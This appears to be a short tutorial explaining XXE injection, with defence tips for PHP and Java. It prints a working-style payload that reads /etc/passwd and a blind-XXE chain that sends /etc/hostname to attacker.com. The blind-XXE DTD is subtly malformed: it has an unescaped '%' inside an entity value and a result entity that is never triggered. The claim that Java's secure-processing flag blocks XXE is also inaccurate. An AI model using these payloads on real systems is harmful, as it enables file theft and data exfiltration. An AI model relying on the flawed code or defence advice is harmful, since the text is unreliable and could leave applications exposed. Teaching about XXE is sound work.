Detailed Explanation of XML External Entity (XXE) Injection Attacks

Detailed Explanation of XML External Entity (XXE) Injection Attacks

Description
XML External Entity (XXE) injection is a security vulnerability targeting XML processors. By crafting malicious XML external entity declarations, attackers can lead to sensitive file reading, internal port scanning, Server-Side Request Forgery (SSRF), and even remote code execution. This vulnerability commonly appears in applications that accept XML input (such as web services, document parsers).

Key Points Explained Step by Step

Review of XML Basic Structure
- XML documents consist of declarations, elements, and entities. For example:
```
<?xml version="1.0"?>
<data>&example;</data>
```
- Entities are divided into internal entities (<!ENTITY example "value">) and external entities (<!ENTITY example SYSTEM "file:///path">). The latter references external resources via the SYSTEM keyword.
XXE Attack Principle
- When the XML parser is improperly configured (e.g., enabling external entity resolution), an attacker can inject malicious entity definitions:
```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE payload [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
```
- The parser will replace &xxe; with the contents of the /etc/passwd file, leading to information disclosure.
Attack Scenario Classification
- Classic File Read: Read server files via the file:// protocol.
- SSRF Attack: Use the http:// protocol to make the server send requests to internal systems (e.g., http://192.168.1.1:8080).
- Blind XXE: When responses do not directly return data, leak information through out-of-band channels (e.g., DNS logs).
- DoS Attack: Exhaust server resources using recursive entity expansion (e.g., XML bombs).
Defense Measures
- Disable External Entities:
  - PHP: libxml_disable_entity_loader(true)
  - Java: Set XMLConstants.FEATURE_SECURE_PROCESSING
- Use Alternative Formats like JSON, or strictly validate XML structure via XSD.
- Whitelist Filtering: Sanitize user-input DOCTYPE declarations or special characters.

Example: Steps for Exploiting Blind XXE

The attacker hosts a DTD file (e.g., http://attacker.com/malicious.dtd):

<!ENTITY % exfil SYSTEM "file:///etc/hostname">
<!ENTITY % send "<!ENTITY % result SYSTEM 'http://attacker.com/?data=%exfil;'>">

Inject XML to trigger external DTD loading:

<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http://attacker.com/malicious.dtd">
  %dtd;
  %send;
]>

When the server parses this, it will send a request containing the file content to the attacker's domain, achieving data exfiltration.

By understanding the XML parsing mechanism and the attack chain, one can effectively configure parsers or adopt secure development practices to block XXE vulnerabilities.